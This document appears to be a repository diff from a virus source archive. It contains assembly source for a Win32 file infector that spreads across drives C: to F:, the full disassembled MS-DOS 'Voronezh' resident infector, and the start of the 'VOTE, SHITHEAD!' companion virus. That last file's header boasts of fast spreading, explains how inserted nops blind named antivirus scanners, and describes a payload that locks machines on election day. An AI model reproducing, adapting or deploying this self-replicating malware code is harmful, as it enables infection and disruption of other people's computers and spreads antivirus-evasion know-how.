push [dwFileHandle] ; Handle of object to close
call CloseHandle
call infect_drives
cmp [exit_flag],TRUE ; Exit code for all threads?
je _ExitProcess ; Equal? Jump to _ExitProcess
_GetExitCodeProcess:
push offset dwExitCode ; Address to receive termination
; status
push [ProcessInformation.hProcess]
; Handle to the process
call GetExitCodeProcess
cmp [dwExitCode],00h ; No error?
je _CreateProcessA ; Equal? Jump to _CreateProcessA
jmp _GetExitCodeProcess
_CreateProcessA:
push offset ProcessInformation
; Pointer to PROCESS_INFORMATION
push offset StartupInfo ; Pointer to STARTUPINFO
push 00h ; Pointer to current directory name
push 00h ; Pointer to new environment block
push NORMAL_PRIORITY_CLASS ; Creation flags
push 00h ; Handle inheritance flag
push 00h ; Pointer to thread security
; attributes
push 00h ; Pointer to process security
; attributes
mov esi,[lpFileExtension] ; ESI = pointer to file extension
mov byte ptr [esi+04h],' ' ; Store space at end of filename
mov [esi],'EXE.' ; Store file extension
mov [esi+05h],'$$$$' ; Store command-line
push offset szFileName__ ; Pointer to command line string
push 00h ; Pointer to name of executable module
call CreateProcessA
_ExitProcess:
push 00h ; Exit code for all threads
call ExitProcess
_DeleteFileA:
push offset szFileName__ ; Address of name of file to delete
call DeleteFileA
jmp _ExitProcess
infect_drives proc near ; Infect drives
push offset cBuffer_ ; Address of buffer for current
; directory
push nBufferLength ; Size, in characters, of directory
; buffer
call GetCurrentDirectoryA
call infect_directories
mov ecx,04h ; Infect drive C:, D:, E: and F:
set_current_directory_loop:
push ecx ; ECX = counter
push offset szCurDir ; Address of name of new current
; directory
call SetCurrentDirectoryA
call infect_directories
inc byte ptr [szCurDir] ; Increase drive letter
pop ecx ; ECX = counter
loop set_current_directory_loop
push offset szCurDir_ ; Address of name of new current
; directory
call SetCurrentDirectoryA
jmp _FindNextFileA
ret ; Return
endp
infect_directories proc near ; Infect directories
push offset cBuffer__ ; Address of buffer for current
; directory
push nBufferLength ; Size, in characters, of directory
; buffer
call GetCurrentDirectoryA
push offset FindFileData ; Address of returned information
push offset szFileName_ ; Address of name of file to search
; for
call FindFirstFileA
mov [dwSearchHandle],eax ; Store search handle
_FindNextFileA:
push offset FindFileData ; Address of returned information
push [dwSearchHandle] ; Handle of search
call FindNextFileA
or eax,eax ; Function failed?
jz function_failed ; Zero? Jump to function_failed
cmp [FindFileData.cFileName],'.'
; Directory?
je _FindNextFileA ; Equal? Jump to _FindNextFileA
mov eax,[FindFileData.dwFileAttributes]
and eax,FILE_ATTRIBUTE_DIRECTORY
; Directory?
jz _FindNextFileA ; Zero? Jump to _FindNextFileA
push offset szCurDir__ ; Address of name of new current
; directory
call SetCurrentDirectoryA
push offset FindFileData.cFileName
; Address of name of new current
; directory
call SetCurrentDirectoryA
push offset FindFileData ; Address of returned information
push offset szFileName ; Address of name of file to search
; for
call FindFirstFileA
mov [dwSearchHandle_],eax ; Store search handle
cmp eax,INVALID_HANDLE_VALUE
je _FindNextFileA ; Function failed? Jump to
; _FindNextFileA
continue_a_file_search:
or eax,eax ; Function failed?
jz _FindNextFileA ; Zero? Jump to _FindNextFileA
call infect_file
push offset FindFileData ; Address of returned information
push [dwSearchHandle_] ; Handle of search
call FindNextFileA
jmp continue_a_file_search
function_failed:
ret ; Return
endp
infect_file proc near ; Infect file
push FILE_ATTRIBUTE_ARCHIVE ; Address of attributes to set
push offset FindFileData.cFileName
; Address of filename
call SetFileAttributesA
push 00h ; Handle of file with attributes to
; copy
push FILE_ATTRIBUTE_ARCHIVE ; File attributes
push OPEN_EXISTING ; How to create
push 00h ; Address of security descriptor
push FILE_SHARE_READ + FILE_SHARE_WRITE
; Share mode
push GENERIC_READ + GENERIC_WRITE
; Access (read-write) mode
push offset FindFileData.cFileName
; Address of name of the file
call CreateFileA
cmp eax,INVALID_HANDLE_VALUE
je _SetFileAttributesA ; Function failed? Jump to
; _SetFileAttributesA
mov [dwFileHandle],eax ; Store file handle
push 00h ; Address of high-order word for file
; size
push eax ; Handle of file to get size of
call GetFileSize
mov [dwFileSize],eax ; Store low-order doubleword of the
; file size
_CreateFileMappingA:
push eax ; EAX = low-order doubleword of the
; file size
push 00h ; Name of file-mapping object
push eax ; Low-order doubleword of object size
push 00h ; High-order doubleword of object size
push PAGE_READWRITE ; Protection for mapping object
push 00h ; Optional security attributes
push [dwFileHandle]
call CreateFileMappingA
mov [dwMappingHandle],eax ; Store file mapping handle
push 00h ; Low-order doubleword of file offset
push 00h ; High-order doubleword of file offset
push FILE_MAP_WRITE ; Access mode
push eax ; File-mapping object to map into
; address space
call MapViewOfFile
cmp [infect_flag],TRUE ; Infect file?
je infect_file_ ; Equal? Jump to infect_file_
mov esi,eax ; ESI = starting address of the mapped
; view
mov edi,[esi+3ch] ; EDI = offset of new executable (NE,
; LE,etc) header within disk file
cmp dword ptr [esi+edi],'EP'
; Portable Executable (PE)?
jne infect_exit ; Not equal? Jump to infect_exit
cmp [esi+6fh],'3NIW'
je infect_exit ; Equal? Jump to infect_exit
call _UnmapViewOfFile
mov [infect_flag],TRUE ; Infect file
mov eax,[dwFileSize] ; EAX = Low-order doubleword of the
; file size
add eax,VirusSize ; Add size of virus to low-order
; doubleword of the file size
jmp _CreateFileMappingA
infect_file_:
mov [infect_flag],FALSE ; Don't infect file
mov [lpMappedView],eax ; Store starting address of the mapped
; view
push edi esi ecx ; Save registers at stack
pushf ; Save flags at stack
add eax,[dwFileSize] ; Add low-order doubleword of the file
; size to starting address of the
; mapped view
add eax,VirusSize-01h ; Add size of virus minus one to
; starting address of the mapped view
mov edi,eax ; EDI = pointer to last byte of file
mov esi,[lpMappedView] ; ESI = starting address of the mapped
; view
add esi,[dwFileSize] ; Add low-order doubleword of the file
; size to starting address of the
; mapped view
mov ecx,[dwFileSize] ; ECX = low-order doubleword of the
; file size
dec esi ; ESI = pointer to last byte of
; original code
std ; Set direction flag
rep movsb ; Move original code to end of file
mov edi,[lpMappedView] ; EDI = starting address of the mapped
; view
xor eax,eax ; Zero EAX
mov ecx,VirusSize ; Store seven thousand and forty-five
; bytes
cld ; Clear direction flag
rep stosb ; Overwrite the first seven thousand
; and forty-five bytes of original
; code
mov edi,[lpMappedView] ; EDI = starting address of the mapped
; view
lea esi,cBuffer ; ESI = offset of cBuffer
mov ecx,VirusSize ; Move seven thousand and forty-five
; bytes
cld ; Clear direction flag
rep movsb ; Move virus to beginning of file
popf ; Load flags from stack
pop ecx esi edi ; Load registers from stack
infect_exit:
call _UnmapViewOfFile
push offset FindFileData.ftLastWriteTime-08h
; Time the file was last written
push offset FindFileData.ftLastAccessTime-04h
; Time the file was last accessed
push offset FindFileData.ftCreationTime
; Time the file was created
push [dwFileHandle] ; Identifies the file
call SetFileTime
push [dwFileHandle] ; Handle of object to close
call CloseHandle
_SetFileAttributesA:
push [FindFileData.dwFileAttributes]
; Address of attributes to set
push offset FindFileData.cFileName
; Address of filename
call SetFileAttributesA
ret ; Return
endp
_UnmapViewOfFile proc near ; Unmaps a mapped view of a file from
; the calling process's address space
; and close it
push [lpMappedView] ; Address where mapped view begins
call UnmapViewOfFile
push [dwMappingHandle] ; Handle of object to close
call CloseHandle
ret ; Return
endp
code_end:
end code_begin

1063
MSDOS/Virus.MSDOS.Unknown.vor_1600.asm Normal file
View File

File diff suppressed because it is too large Load Diff

1063
MSDOS/Virus.MSDOS.Unknown.vor_1600.lst Normal file
View File

File diff suppressed because it is too large Load Diff

880
MSDOS/Virus.MSDOS.Unknown.voronezh.asm Normal file
View File

@ -0,0 +1,880 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ VORONEZH ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 2-Mar-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AJW ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 1C2h
data_5e equ 3
data_6e equ 0
data_7e equ 2
data_46e equ 100h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
voronezh proc far
start:
mov ax,ds
push cs
pop ds
push ax
call sub_1
voronezh endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
pop bx
sub bx,108h
push bx
mov ah,0ABh
int 21h ; ??INT Non-standard interrupt
cmp ax,5555h
jne loc_1 ; Jump if not equal
jmp loc_10
loc_1:
mov ax,es
sub ax,1
mov ds,ax
mov bx,data_5e
mov ax,ds:[bx]
sub ax,0EAh
mov ds:[bx],ax
push es
pop ds
mov bx,data_7e
mov ax,ds:[bx]
sub ax,0EAh
mov ds:[bx],ax
mov es,ax
mov di,data_46e
mov si,100h
pop bx
push bx
add si,bx
push cs
pop ds
mov cx,6A4h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov dx,ax
jmp short loc_9
nop
pushf ; Push flags
sti ; Enable interrupts
cmp ah,0ABh
jne loc_2 ; Jump if not equal
mov ax,5555h
popf ; Pop flags
iret ; Interrupt return
loc_2:
cmp ax,3D00h
jne loc_5 ; Jump if not equal
push ax
push bx
push cx
push dx
push si
push di
push es
mov cx,41h
xor al,al ; Zero register
mov di,dx
push ds
pop es
repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al
sub di,4
mov si,di
push si
push cs
pop es
mov cx,4
mov di,289h
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
cmp cx,0
jne loc_3 ; Jump if not equal
pop si
jmp short loc_4
nop
loc_3:
mov di,28Ch
mov cx,4
pop si
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
cmp cx,0
loc_4:
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jz loc_6 ; Jump if zero
loc_5:
push ax
inc ah
cmp ax,4C00h
pop ax
jnz loc_8 ; Jump if not zero
loc_6:
push ax
push bx
push cx
push dx
push si
push di
push es
push ds
jmp loc_16
loc_7:
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
loc_8:
popf ; Pop flags
;* jmp far ptr loc_49
db 0EAh,0B5h, 02h, 46h,0D5h
loc_9:
mov ds,dx
mov ax,3521h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov ds:data_1e,bx
db 3Eh, 8Ch, 06h,0C4h, 01h, 3Eh
db 89h, 1Eh, 75h, 03h, 3Eh, 8Ch
db 06h, 77h, 03h, 8Dh, 16h, 53h
db 01h,0B8h, 21h, 25h,0CDh
db 21h
loc_10:
pop dx
mov bx,offset data_18
add bx,dx
cmp byte ptr cs:[bx],0
je loc_12 ; Jump if equal
pop ds
mov ax,ds
push cs
pop ds
mov cx,dx
pop di
pop es
push ax
sub di,5
mov si,offset data_17
add si,cx
mov dl,[si]
add es:[di+5],dl
cmp es:[di+5],dl
ja loc_11 ; Jump if above
dec si
inc byte ptr [si]
loc_11:
mov dx,di
mov si,offset data_16
add si,cx
mov cx,5
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop ds
push es
push dx
mov ax,ds
mov es,ax
xor ax,ax ; Zero register
xor bx,bx ; Zero register
xor cx,cx ; Zero register
xor dx,dx ; Zero register
xor si,si ; Zero register
xor di,di ; Zero register
retf ; Return far
loc_12:
mov ax,cs
mov ds,ax
mov es,ax
mov si,268h
mov cx,100h
mov bx,281h
mov di,[bx]
cmp di,0
jne loc_13 ; Jump if not equal
int 20h ; DOS program terminate
loc_13:
mov bx,283h
mov ax,[bx]
add di,ax
add di,100h
cld ; Clear direction
push di
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop di
mov cx,word ptr ds:[283h]
mov ax,word ptr ds:[281h]
push di
retn
add ax,100h
mov si,ax
mov di,100h
cld ; Clear direction
locloop_14:
mov al,[si]
xor al,0BBh
mov [di],al
inc si
inc di
loop locloop_14 ; Loop if cx > 0
mov ax,offset start
pop bx
push ax
retn
inc ax
push es
inc ax
push es
push si
add ax,0E2Bh
inc bp
pop ax
inc bp
db 65h, 78h, 65h, 55h, 76h, 7Fh
db 'ctsqu`Voronezh,1990 2.01'
data_16 db 90h
db 0B8h, 7Fh, 0Eh, 8Eh
data_17 db 0
data_18 db 0
data_19 dw 200h
data_20 dw 14Dh
data_21 db 0, 0, 0, 0, 0
data_22 dw 0
data_23 dw 34Dh
data_24 dw 0
data_25 dw 5D0h
data_26 db 9Ah
data_27 dw 5D0h
data_28 dw 0
data_29 dw 0
data_30 dw 1Eh
data_31 dw 100h
data_32 dw 100h
data_33 db 5
data_34 dw 20h
data_35 dw 0A956h
data_36 dw 41B9h
loc_ret_15:
iret ; Interrupt return
loc_16:
mov bx,dx
mov ax,ds:[bx+3]
cmp ax,4F43h
jne $+5 ; Jump if not equal
jmp loc_7
sub_1 endp
mov di,dx
xor ax,ax ; Zero register
mov cs:data_33,0
db 3Eh, 80h, 7Dh, 01h, 3Ah
db 75h, 09h, 3Eh, 8Ah, 05h, 24h
db 9Fh, 2Eh,0A2h,0CFh, 02h
loc_18:
mov ax,4300h
int 21h ; DOS Services ah=function 43h
; get attrb cx, filename @ds:dx
mov cs:data_34,cx
mov cs:data_35,ds
mov cs:data_36,dx
push ds
push dx
push es
push cs
pop ds
mov ax,3524h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov word ptr ds:[285h],bx
mov word ptr ds:[287h],es
mov dx,offset loc_ret_15
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
pop es
pop dx
pop ds
push ds
push cs
pop ds
mov bx,100h
mov cx,740h
sub cx,bx
mov bx,283h
mov [bx],cx
pop ds
mov bx,dx
push ds
push dx
push bx
push cs
pop ds
mov ah,36h ; '6'
mov dl,data_33
int 21h ; DOS Services ah=function 36h
; get drive info, drive dl,1=a:
; returns ax=clust per sector
; bx=avail clust,cx=bytes/sect
; dx=clusters per drive
cmp ax,0FFFFh
jne loc_24 ; Jump if not equal
loc_23:
pop ax
pop ax
pop ax
call sub_3
jmp loc_7
loc_24:
mul bx ; dx:ax = reg * ax
mul cx ; dx:ax = reg * ax
or dx,dx ; Zero ?
jnz loc_25 ; Jump if not zero
cmp ax,word ptr ds:[283h]
jb loc_23 ; Jump if below
loc_25:
pop bx
pop dx
pop ds
mov ax,3D00h
pushf ; Push flags
cli ; Disable interrupts
;* call far ptr sub_5
db 9Ah,0B5h, 02h, 46h,0D5h
jnc loc_26 ; Jump if carry=0
call sub_3
jmp loc_7
loc_26:
push ax
mov ax,cs
mov ds,ax
mov es,ax
pop ax
push ax
mov bx,ax
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get file date+time, bx=handle
; returns cx=time, dx=time
pop ax
push cx
push dx
push ax
mov bx,ax
mov cx,0
mov dx,0
mov ah,42h ; 'B'
mov al,2
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov bx,281h
mov [bx],ax
mov bx,283h
mov cx,[bx]
mov cx,0
mov dx,0
mov ax,4200h
pop bx
push bx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov bx,283h
mov cx,[bx]
pop bx
push bx
mov dx,offset data_37
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
mov si,offset data_37
mov cx,[si]
cmp cx,0D88Ch
jne loc_27 ; Jump if not equal
pop bx
pop ax
pop ax
call sub_2
jmp loc_7
loc_27:
cmp cx,5A4Dh
je loc_28 ; Jump if equal
jmp loc_44
loc_28:
pop bx
push bx
mov ax,4200h
xor cx,cx ; Zero register
xor dx,dx ; Zero register
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov cx,32h
mov ax,3F00h
lea dx,data_37 ; Load effective addr
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
mov ax,data_39
mov cx,4
mul cx ; dx:ax = reg * ax
mov bx,data_44
add ax,bx
mov dx,ax
mov di,dx
mov ax,data_40
mov cx,10h
mul cx ; dx:ax = reg * ax
mov dx,di
add dx,4
cmp ax,dx
ja loc_29 ; Jump if above
jmp loc_43
loc_29:
mov data_19,ax
mov ax,data_39
inc ax
mov data_39,ax
mov ax,data_42
mov data_20,ax
mov ax,data_43
mov word ptr data_21,ax
xor dx,dx ; Zero register
xor cx,cx ; Zero register
mov ax,4202h
pop bx
push bx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
push ax
push dx
add ax,word ptr ds:[283h]
cmp ax,word ptr ds:[283h]
ja loc_30 ; Jump if above
inc dx
loc_30:
mov cx,200h
div cx ; ax,dx rem=dx:ax/reg
cmp dx,0
je loc_31 ; Jump if equal
inc ax
loc_31:
mov bx,data_38
mov cx,ax
sub cx,bx
cmp cx,5
jb loc_32 ; Jump if below
pop ax
pop ax
jmp loc_43
loc_32:
mov data_38,ax
pop dx
pop ax
mov bx,data_19
cmp ax,bx
jb loc_33 ; Jump if below
sub ax,bx
jmp short loc_34
nop
loc_33:
sub ax,bx
dec dx
loc_34:
mov data_24,dx
mov data_25,ax
mov ax,data_19
mov bx,data_20
mov dx,0
add ax,bx
cmp ax,bx
ja loc_35 ; Jump if above
inc dx
loc_35:
mov si,ax
mov di,dx
mov ax,word ptr data_21
mov cx,10h
mul cx ; dx:ax = reg * ax
add di,dx
add si,ax
cmp si,ax
ja loc_36 ; Jump if above
inc di
loc_36:
mov ax,si
mov dx,di
mov data_22,dx
mov data_23,ax
mov cx,dx
mov dx,ax
mov ax,4200h
mov data_18,1
mov data_17,0
pop bx
push bx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov cx,5
lea dx,data_16 ; Load effective addr
mov ax,3F00h
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
cmp data_16,9Ah
jne loc_37 ; Jump if not equal
jmp loc_43
loc_37:
call sub_4
mov bx,data_44
mov ax,data_39
dec ax
mov cx,4
mul cx ; dx:ax = reg * ax
add bx,ax
mov cx,0
mov dx,bx
mov ax,4200h
pop bx
push bx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov dx,data_20
add dx,3
mov data_20,dx
lea dx,data_20 ; Load effective addr
mov cx,4
mov ah,40h ; '@'
pop bx
push bx
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
mov dx,data_20
sub dx,3
mov data_20,dx
xor dx,dx ; Zero register
xor cx,cx ; Zero register
mov ax,4200h
pop bx
push bx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov cx,data_44
lea dx,data_37 ; Load effective addr
mov ah,40h ; '@'
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
mov data_26,9Ah
mov ax,data_25
mov data_27,ax
mov ax,data_24
mov cx,1000h
mul cx ; dx:ax = reg * ax
mov data_28,ax
cmp data_27,0F000h
jb loc_38 ; Jump if below
mov ax,data_27
mov dx,data_28
add dx,100h
sub ax,1000h
mov data_28,dx
mov data_27,ax
loc_38:
mov cx,data_22
mov dx,data_23
mov ax,4200h
pop bx
push bx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov cx,5
mov ah,40h ; '@'
lea dx,data_26 ; Load effective addr
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
mov cx,0
mov dx,0
mov ax,4202h
pop bx
push bx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov ah,40h ; '@'
mov cx,word ptr ds:[283h]
mov dx,100h
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
xor cx,cx ; Zero register
mov dx,data_44
mov ax,4200h
pop bx
push bx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov data_32,0
mov data_29,dx
mov data_30,ax
mov ax,data_39
mov di,0
dec ax
cmp ax,0
jne loc_39 ; Jump if not equal
jmp loc_43
loc_39:
mov cx,4
mul cx ; dx:ax = reg * ax
mov si,ax
loc_40:
mov cx,0
mov dx,0
mov ax,4201h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov data_29,dx
mov data_30,ax
mov cx,100h
mov dx,data_6e
mov ax,3F00h
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
mov di,data_6e
mov data_31,ax
add data_32,ax
loc_41:
mov ax,[di+2]
cmp ax,word ptr data_21
jne loc_42 ; Jump if not equal
mov ax,[di]
cmp ax,data_20
jb loc_42 ; Jump if below
mov ax,data_20
add ax,5
cmp ax,[di]
jbe loc_42 ; Jump if below or =
mov ax,data_28
mov [di+2],ax
mov ax,[di]
mov bx,data_20
sub ax,bx
push ax
mov ax,2AAh
sub ax,100h
mov bx,data_27
add ax,bx
pop bx
add ax,bx
mov [di],ax
mov cx,data_29
mov dx,data_30
mov ax,4200h
pop bx
push bx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov cx,data_31
mov ah,40h ; '@'
pop bx
push bx
mov dx,data_6e
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
jmp short loc_43
nop
loc_42:
add di,4
mov ax,data_32
sub ax,100h
add ax,di
cmp ax,si
je loc_43 ; Jump if equal
cmp di,data_31
jb loc_41 ; Jump if below
jmp loc_40
loc_43:
jmp short loc_48
nop
loc_44:
mov cx,word ptr ds:[281h]
cmp cx,0EE48h
jb loc_46 ; Jump if below
loc_45:
pop bx
pop ax
pop ax
call sub_2
jmp loc_7
loc_46:
cmp cx,word ptr ds:[283h]
jb loc_45 ; Jump if below
call sub_4
mov data_18,0
mov dx,0
mov cx,0
mov ax,4202h
pop bx
push bx
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov si,283h
mov cx,[si]
mov ah,40h ; '@'
push cx
mov bx,offset data_37
locloop_47:
mov al,[bx]
xor al,0BBh
mov [bx],al
inc bx
loop locloop_47 ; Loop if cx > 0
pop cx
pop bx
push bx
mov dx,offset data_37
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
mov ax,4200h
mov dx,0
mov cx,0
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
mov bx,110h
mov si,283h
mov cx,[si]
mov dx,100h
mov ah,40h ; '@'
pop bx
push bx
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_48:
pop bx
pop dx
pop cx
push bx
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; set file date+time, bx=handle
; cx=time, dx=time
mov dx,data_36
mov ds,data_35
mov ax,4301h
mov cx,cs:data_34
int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
push cs
pop ds
pop bx
call sub_2
jmp loc_7
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_2 proc near
mov ax,3E00h
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_3:
mov bx,word ptr ds:[285h]
mov es,word ptr ds:[287h]
mov ax,2524h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
retn
sub_2 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_4 proc near
push bp
mov bp,sp
push ds
mov ax,4301h
mov dx,data_36
mov ds,data_35
xor cx,cx ; Zero register
int 21h ; DOS Services ah=function 43h
; set attrb cx, filename @ds:dx
jnc $+8 ; Jump if carry=0
pop ds
pop bp
pop ax
jmp loc_43
sub_4 endp
db 36h, 8Bh, 5Eh, 04h,0B8h, 00h
db 3Eh,0CDh, 21h,0B8h, 02h, 3Dh
db 0FAh, 9Ch, 2Eh,0FFh, 1Eh,0C2h
db 01h, 1Fh, 36h, 89h, 46h, 04h
db 5Dh,0C3h
data_37 db 3
db 0BBh,0F7h, 76h
data_38 dw 0BB9Ah
data_39 dw 0BBBBh
data_40 dw 0BBBBh
db 10 dup (0BBh)
data_42 dw 0BBBBh
data_43 dw 0BBBBh
data_44 dw 0BBBBh
db 1574 dup (0BBh)
seg_a ends
end start

319
MSDOS/Virus.MSDOS.Unknown.vote.asm Normal file
View File

@ -0,0 +1,319 @@
;****************************************************************************
;* VOTE, SHITHEAD! virus Edited by URNST KOUCH for the Crypt Newsletter 7.
;*
;* TASM/MASM compatible source listing
;*
;* VOTE, SHITHEAD is a resident, companion virus based upon Little
;* Brother code and library .asm routines extracted from Nowhere Man's VCL.
;* It is also 'patched' with three 'nops' (they are commented) which
;* effectively blind a number of a-v scanners. This simple alteration
;* demonstrates a practical benefit of source code possession: quick
;* generation of different virus strains becomes a task within anyone's
;* reach. The only tools needed are a number of virus scanners and patience.
;*
;* In any case, the VOTE virus is just the ideal sample needed for
;* judicious virus action. It is a PERFECT tool for viral spreading for
;* a number of reasons. First, it is a FAST infector. Once resident
;* VOTE will create a companion file for ANY .EXE executed on ANY drive
;* and it will do it so quickly that most users, even suspicious ones,
;* will not notice any slowdown or glitches in machine operation.
;* Second, 'companion-ed' .EXE's will continue to load and function
;* properly when VOTE is resident. At the start of the day's computing,
;* the first 'companion-ed' .EXE executed will misfire ONCE as the virus
;* becomes resident. If it is re-called it will function perfectly.
;* Third, VOTE like the INSUFF viruses in the last newsletter strikes
;* directly at anti-virus suites vulnerable to 'spawning' infections (many
;* no-names, CPAV, NAV) and creates 'hidden' companion files, an improvement
;* over the original virus's modus operandi which left them out in plane
;* sight in the directory. Last, VOTE is very small. In RAM, it is not
;* discernible, taking up slightly less that 0.25k. Characteristically,
;* this is NOT reported by a mem /c display. In fact,
;* VOTE is almost invisible to any number of standard diagnostic
;* tests. Memory maps by QEMM and Norton's SYSINFO will
;* report INT 21 hooked differently. But unless the user can compare
;* an uncontaminated INTERRUPT report with one when the virus IS present,
;* it's unlikely he'll know anything is different. Even then, VOTE is hard
;* to notice.
;*
;* On election day, November 3rd, VOTE will lock an infected machine into
;* a loop as it displays a "DID YOU VOTE, SHITHEAD??" query repetitively
;* across the monitor. Computing will be impossible on Nov. 3rd
;* unless VOTE is removed from the machine, a task accomplished by unmasking
;* all the hidden .COMfiles and deleting them while
;* the virus is NOT resident. At all other times, VOTE is almost completely
;* transparent.
;****************************************************************************
code segment
assume cs:code,ds:code,es:nothing
.RADIX 16
oi21 equ endit
nameptr equ endit+4
DTA equ endit+8
;****************************************************************************
;* Check for activation date, then proceed to installation!
;****************************************************************************
org 100h
begin:
call get_day ; Get the day, DOS time/date grab
cmp ax,0003h ; Did the function return the 3rd?
jne realstrt ; If equal, continue along stream
call get_month ; Get the month, DOS time/date grab
cmp ax,000Bh ; Did the function return November (11)?
jne realstrt ; If equal, continue to blooie; if not
; skip to loading of virus
blooie: mov dx, offset shithead ;load 'shithead' message
mov ah,9 ;display it and loop
int 21h ;endlessly until
jmp blooie ;user becomes ill and reboots
realstrt: mov ax,0044h ;move VOTE SHITHEAD to empty hole in RAM
nop ;a 'nop' to confuse tbSCAN
mov es,ax
nop ;a 'nop' to confuse Datatechnik's AVscan
mov di,0100h
mov si,di
mov cx,endit - begin ;length of SHITHEAD into cx
rep movsb
mov ds,cx ;get original int21 vector
mov si,0084h
mov di,offset oi21
mov dx,offset ni21
lodsw
cmp ax,dx ;check to see if virus is around
je cancel ; by comparing new interrupt (ni21)
stosw ; vector to current, if it looks
movsw ; the same 'cancel' operation
push es ;set vector to new handler
pop ds
mov ax,2521h
int 21h
cancel: ret
;****************************************************************************
;* File-extension masks for checking and naming routines;message text
;****************************************************************************
EXE_txt db 'EXE',0
COM_txt db 'COM',0
SHITHEAD db "DID YOU VOTE, SHITHEAD??"
